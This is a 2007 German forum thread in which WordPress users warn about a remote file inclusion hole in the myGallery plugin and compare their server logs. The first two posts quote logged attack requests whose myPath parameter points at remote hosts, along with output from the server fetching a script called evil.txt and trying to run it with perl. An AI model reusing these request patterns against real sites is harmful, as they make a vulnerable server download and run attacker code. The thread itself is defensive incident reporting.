21.06.2007, 17:49
| #1 (permalink) |
| PostRank: 3   Registriert seit: 25.01.2006 Ort: Zülpich
Beiträge: 114
| Warnung vor myGallery Ich möchte zwar hier keine Pferde scheu machen oder sonstiges, aber so wie es aussieht ist wildbits -- myGallery auch in der aktuellen Version offen für Exploits. Wenn ich das richtig im Kopf habe, nicht das erste mal. Auf meinem Server hoste ich derzeit temporär einen, nennen wir es Gast, und seitdem habe ich deftige Probleme auf der Maschine. Ergo, Logfiles sichten. Just beim sichten spawnten 4 Perl-Prozesse welche sich die komplette CPU teilten. In den Logfiles finde ich Einträge ala: Code: Gestern: 217.133.11.130 - - [19/Jun/2007:20:59:17 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebtown.com/scan/evilx? HTTP/1.1" 302 423 "-" "libwww-perl/5.65" 217.133.11.130 - - [19/Jun/2007:20:59:17 +0200] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebtown.com/scan/evilx? HTTP/1.1" 302 423 "-" "libwww-perl/5.65" Heute: 204.152.189.72 - - [21/Jun/2007:14:25:09 +0200] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://200.14.236.50/intranet/img/c.txt?\r HTTP/1.1" 302 - "-" "curl/7.9.8 (i386-redhat-linux-gnu) libcurl 7.9.8 (OpenSSL 0.9.7a) (ipv6 enabled)" Code: --18:24:10-- http://www.freewebtown.com/scan/evil.txt
=> `evil.txt'
Resolving www.freewebtown.com... 198.78.81.43
Connecting to www.freewebtown.com|198.78.81.43|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17,128 (17K) [text/plain]
0K .......... ...... 100% 78.12 KB/s
18:24:11 (78.12 KB/s) - `evil.txt' saved [17128/17128]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 17128 100 17128 0 0 38972 0 --:--:-- --:--:-- --:--:-- 73013
sh: fetch: command not found
Can't open perl script "evil.txt": No such file or directory
[Wed Jun 20 18:59:57 2007] [error] [client 127.0.0.1] File does not exist: /srv/www/vhosts/default/htdocs/r57shell
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key Deswegen meine Vermutung das myGallery verwundbar ist, und wenn ich mir die geladenen URL/txt anschaue wird mir ganz anders. Vielleicht kann dies Jemand bestätigen oder evt. mal in seinen Logs nachprüfen. Ich persönlich setze dieses Plugin nicht ein, kann deswegen auch nicht viel dazu sagen.
__________________ http://www.discobeats.de |
|  |
|
21.06.2007, 19:01
| #2 (permalink) |
| PostRank: 4  Registriert seit: 01.08.2006
Beiträge: 154
| Ich kann das Problem auf meinem Blog (WP 2.2.0, mygallery 1.4b6) nicht nachstellen, aber die einträge im access log habe ich auch und nicht zu knapp: Code: 194.105.128.149 - - [17/Jun/2007:08:59:38 +0200] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.tritonzao.by.ru/echo.txt? HTTP/1.1" 302 - "-" "libwww-perl/5.805" 194.105.128.149 - - [17/Jun/2007:08:59:38 +0200] "GET /wp-login.php?redirect_to=%2F%2Fwp-content%2Fplugins%2Fmygallery%2Fmyfunctions%2Fmygallerybrowser.php%3FmyPath%3Dhttp%3A%2F%2Fwww.tritonzao.by.ru%2Fecho.txt%3F HTTP/1.1" 200 2063 "-" "libwww-perl/5.805"
__________________ Lustige Erlebnisse mit der Deutschen Bahn |
|
| |
|
21.06.2007, 19:13
| #3 (permalink) | |
| PostRank: 4 Registriert seit: 01.08.2006
Beiträge: 154
| Ok, Tante Google hat Antworten: FrSIRT Security Advisories - myGallery Plugin for Wordpress "myPath" Parameter Remote File Inclusion Vulnerability / Exploit WordPress myGallery Plugin "myPath" File Inclusion - Advisories - Secunia Zitat:
__________________ Lustige Erlebnisse mit der Deutschen Bahn | |
|
| |
 |
| Lesezeichen |
| Themen-Optionen | |
| Ansicht | |
Linear-Darstellung
| |
Alle Zeitangaben in WEZ +1. Es ist jetzt 07:45 Uhr.